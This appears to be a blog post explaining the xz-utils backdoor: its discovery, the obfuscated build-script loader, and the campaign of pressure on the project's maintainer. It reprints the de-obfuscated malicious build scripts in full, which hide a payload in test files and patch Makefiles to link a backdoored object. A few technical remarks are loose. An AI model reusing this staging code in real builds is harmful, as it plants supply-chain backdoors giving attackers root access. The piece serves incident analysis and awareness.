The liblzma (.xz) backdoor.

In the past few weeks, a few vulnerabilities were found in projects related to the Linux ecosystem, but what shook the world was an actual backdoor that was found in the xz-utils package.

Description of the backdoor

This backdoor was found by Microsoft employee Andres Freund in a very impressive manner. While using the testing branch of Debian, he noticed that the SSH connections he was making were taking longer than expected (in the order of milliseconds). Instead of the usual 300ms, he was waiting 807ms.

You may ask yourself, what does liblzma have to do with OpenSSH?

Well, OpenSSH doesn't directly depend on liblzma, but rather on certain distributions, such as Debian, OpenSSH is patched to support systemD notifications, the latter having a dependency on liblzma. In this way, the attacker can gain access to a remote system through this backdoor and have a root shell.

Fortunately, this backdoor was found in the upstream tarballs and source code (versions 5.6.x) and it didn't make it's way into downstream repositories.

The technical side

The backdoor was hidden in a very clever manner and if it wasn't for this Microsoft employee (who is not a security engineer, btw), it could've been way worse.

There is an obfuscated script which is called at the end of the configuration phase of the build.
Here is a de-obfuscated version of that script:

am__test = bad-3-corrupt_lzma2.xz
...
am__test_dir=$(top_srcdir)/tests/files/$(am__test)
...
sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1


which ends up as
...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash
>/dev/null 2>&1; ...

Leaving out the "| bash" that produces

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c
+2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048
&& (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 &&
(head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head
-c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c
+1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
>/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024
>/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail
-c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1
-dc|/bin/sh
####World####

As you can see, the script is dependent of the test files found in the repository. But what is up with that exported environment variable and all those redirects?

Basically, every 1024 bytes jumps are thrown away, since they do not contain the code that the attacker wants and only save 2048 bytes. This is done until he reaches the last 724 bytes which contain the payload. At this point, all of those bytes (31265) saved are then piped to remove rubbish information through tr and finally, through the xz utility it outputs the backdoor to a raw format which is saved to a file (which Andres Freund published as injected.txt).

If you want to see the full contents of this file, use the button down below to see the code.

injected.txt

```bash
P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
eval `grep ^LD=\'\/ config.status`
eval `grep ^CC=\' config.status`
eval `grep ^GCC=\' config.status`
eval `grep ^srcdir=\' config.status`
eval `grep ^build=\'x86_64 config.status`
eval `grep ^enable_shared=\'yes\' config.status`
eval `grep ^enable_static=\' config.status`
eval `grep ^gl_path_map=\' config.status`
eval $zrKccj
if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h > /dev/null 2>&1;then
exit 0
fi
if test "x$enable_shared" != "xyes";then
exit 0
fi
if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq
"linux-gnu$" > /dev/null 2>&1);then
exit 0
fi
if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
exit 0
fi
if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
exit 0
fi
LDv=$LD" -v"
if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$p" > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$U" > /dev/null 2>&1;then
exit 0
fi
if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then
eval $zrKcst
j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4"
if ! grep -qs "$j" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
z="^am__uninstall_files_from_dir = {"
if ! grep -qs "$z" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
w="^am__install_max ="
if ! grep -qs "$w" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
E=$z
if ! grep -qs "$E" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
Q="^am__vpath_adj_setup ="
if ! grep -qs "$Q" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
M="^am__include = include"
if ! grep -qs "$M" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
L="^all: all-recursive$"
if ! grep -qs "$L" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
m="^LTLIBRARIES = \$(lib_LTLIBRARIES)"
if ! grep -qs "$m" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
u="AM_V_CCLD = \$(am__v_CCLD_\$(V))"
if ! grep -qs "$u" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs "$O" libtool > /dev/null 2>&1;then
exit 0
fi
eval $zrKcTy
b="am__test = $U"
sed -i "/$j/i$b" src/liblzma/Makefile || true
d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'`
b="am__strip_prefix = $d"
sed -i "/$w/i$b" src/liblzma/Makefile || true
b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)"
sed -i "/$E/i$b" src/liblzma/Makefile || true
b="\$(top_srcdir)/tests/files/\$(am__test)"
s="am__test_dir=$b"
sed -i "/$Q/i$s" src/liblzma/Makefile || true
h="-Wl,--sort-section=name,-X"
if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
h=$h",-z,now"
fi
j="liblzma_la_LDFLAGS += $h"
sed -i "/$L/i$j" src/liblzma/Makefile || true
sed -i "s/$O/$C/g" libtool || true
k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))"
sed -i "s/$u/$k/" src/liblzma/Makefile || true
l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\
export top_srcdir='\$(top_srcdir)'; \\\\\n\
export CC='\$(CC)'; \\\\\n\
export DEFS='\$(DEFS)'; \\\\\n\
export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\
export INCLUDES='\$(INCLUDES)'; \\\\\n\
export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\
export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\
export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\
export CFLAGS='\$(CFLAGS)'; \\\\\n\
export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\
export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\
export libdir='\$(libdir)'; \\\\\n\
export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\
export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\
sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1";
sed -i "/$m/i$l" src/liblzma/Makefile || true
eval $zrKcHD
fi
elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
eval $zrKcKQ
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then
exit 0
fi
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then
exit 0
fi
if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$C" ../../libtool; then
exit 0
fi
if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
exit 0
fi
if echo $liblzma_la_LINK | grep -qs -e "lazy" > /dev/null 2>&1;then
exit 0
fi
N=0
W=0
Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4`
eval $zrKcjv
if test -z "$Y"; then
N=0
W=88792
else
N=88792
W=0
fi
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk
'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
if ! test -f liblzma_la-crc64-fast.o; then
exit 0
fi
cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) &&
defined(CRC_USE_IFUNC) && defined(PIC) && (defined(BUILDING_CRC64_CLMUL) ||
defined(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*,
void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4];
success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16); const
uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) ==
ecx_mask; }\n#else\n#define _is_arch_extension_supported is_arch_extension_supported'
eval $yosA
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()"
$top_srcdir/src/liblzma/check/crc64_fast.c | \
sed "/include \"crc_x86_clmul.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r
liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null; then
cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true
eval $BPep
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()"
$top_srcdir/src/liblzma/check/crc32_fast.c | \
sed "/include \"crc32_arm64.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c -
$P -o .libs/liblzma_la-crc32_fast.o; then
eval $RgYB
if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
if test ! -f .libs/liblzma.so; then
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -f .libs/liblzma_la-crc32-fast.o || true
rm -f .libs/liblzma_la-crc64-fast.o || true
else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
else
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -f liblzma_la-crc64-fast.o || true
fi
eval $DHLd
```

Analyzing the code above, we see that in order for this backdoor to be built, there are a few conditions which need to be met:

  • The system has to be x86_64 architecture
  • The system needs to have installed gcc and a debugger (like ld)
  • The system needs to be a Debian or RHEL/SUSE based system.

In the end, if all these conditions are met, through a specific Ed448 private key the attacker gains root access to the system.

The sad story that started this fiasco

This sophisticated attack started all the way back in 2022. It isn't a hack your way-in type of story, but rather take advantage of the maintainer's mental problems to break in.

Thanks to the mail-archive, we can see the full thread of this conversation.

It all started with this question from Dennis Ens:

Is XZ for Java still maintained? I asked a question here a week ago
and have not heard back. When I view the git log I can see it has not
updated in over a year. I am looking for things like multithreaded
encoding / decoding and a few updates that Brett Okken had submited
(but are still waiting for merge). Should I add these things to only
my local version, or is there a plan for these things in the future?

To which the maintainer replies:

Yes, by some definition at least, like if someone reports a bug it will
get fixed. Development of new features definitely isn't very active. :-(


> I asked a question here a week ago and have not heard back.

I saw. I have lots of unanswered emails at the moment and obviously
that isn't a good thing. After the latest XZ for Java release I've
tried focus on XZ Utils (and ignored XZ for Java), although obviously
that hasn't worked so well either even if some progress has happened
with XZ Utils.

...

Jia Tan has helped me off-list with XZ Utils and he might have a bigger
role in the future at least with XZ Utils. It's clear that my resources
are too limited (thus the many emails waiting for replies) so something
has to change in the long term.

As you can see, the maintainer does only maintenance work and cannot keep up with the requests he has. But in the very same message, the maintainer mentions the attacker (Jia Tan), who has helped him with his work.

Unfortunately, things start going down south from here, as a new person arrives in this thread, by the name Jigar Kumar (who is most likely Jia Tan acting as multiple persons):

Progress will not happen until there is new maintainer. XZ for C has sparse 
commit log too. Dennis you are better off waiting until new maintainer happens 
or fork yourself. Submitting patches here has no purpose these days. The 
current maintainer lost interest or doesn't care to maintain anymore. It is sad 
to see for a repo like this.

Jigar tries to undermine the maintainer's potential. Assuming Jigar and Jia Tan are the same person, the attacker is doing this fully knowing of the maintainer's mental state and we can see that the maintainer acknowledges his struggles:

I haven't lost interest but my ability to care has been fairly limited
mostly due to longterm mental health issues but also due to some other
things. Recently I've worked off-list a bit with Jia Tan on XZ Utils and
perhaps he will have a bigger role in the future, we'll see.

It's also good to keep in mind that this is an unpaid hobby project.

Anyway, I assure you that I know far too well about the problem that
not much progress has been made. The thought of finding new maintainers
has existed for a long time too as the current situation is obviously
bad and sad for the project.

A new XZ Utils stable branch should get released this year with
threaded decoder etc. and a few alpha/beta releases before that.
Perhaps the moment after the 5.4.0 release would be a convenient moment
to make changes in the list of project maintainer(s).

Forks are obviously another possibility and I cannot control that. If
those happen, I hope that file format changes are done so that no
silly problems occur (like using the same ID for different things in
two projects). 7-Zip supports .xz and keeping its developer Igor Pavlov
informed about format changes (including new filters) is important too.

As the maintainer says, this is a project made as a hobby and it is not paid, so he has no obligations whatsoever. The project is open source, so forks exist or anyone can just take the code and make it their way. But Jigar/Jia (and possibly Dennis too) continues to make the maintainer feel bad about himself by telling him he isn't good for this project and that he should find a new maintainer who cares and doesn't "let the community down":

Jigar: With your current rate, I very doubt to see 5.4.0 release this year. The only 
progress since april has been small changes to test code. You ignore the many 
patches bit rotting away on this mailing list. Right now you choke your repo. 
Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?

Dennis: 
I am sorry about your mental health issues, but its important to be
aware of your own limits. I get that this is a hobby project for all
contributors, but the community desires more. Why not pass on
maintainership for XZ for C so you can give XZ for Java more
attention? Or pass on XZ for Java to someone else to focus on XZ for
C? Trying to maintain both means that neither are maintained well.

The thread ends with the maintainer explaining the situation of finding a new co-maintainer and mentions Jia Tan once again:

Finding a co-maintainer or passing the projects completely to someone
else has been in my mind a long time but it's not a trivial thing to
do. For example, someone would need to have the skills, time, and enough
long-term interest specifically for this. There are many other projects
needing more maintainers too.

As I have hinted in earlier emails, Jia Tan may have a bigger role in
the project in the future. He has been helping a lot off-list and is
practically a co-maintainer already. :-) I know that not much has
happened in the git repository yet but things happen in small steps. In
any case some change in maintainership is already in progress at least
for XZ Utils.

And indeed, as the maintainer hinted, Jia Tan gained even more access; to the point where he got the privilege of releasing tarballs created by him.

Jia/Jigar/Dennis has effectively built trust by helping the maintainer, and then take advantage of the maintainer's mental struggles by impersonating people who undermine his potential.

Conclusion

This is a sad story that not many know, and hopefully it will be heard as the maintainer doesn't need to be bashed for his choices, but rather helped and encouraged to overcome his problems.

As for the technical side of things, reverse engineers are still working on discovering the full potential of the backdoor.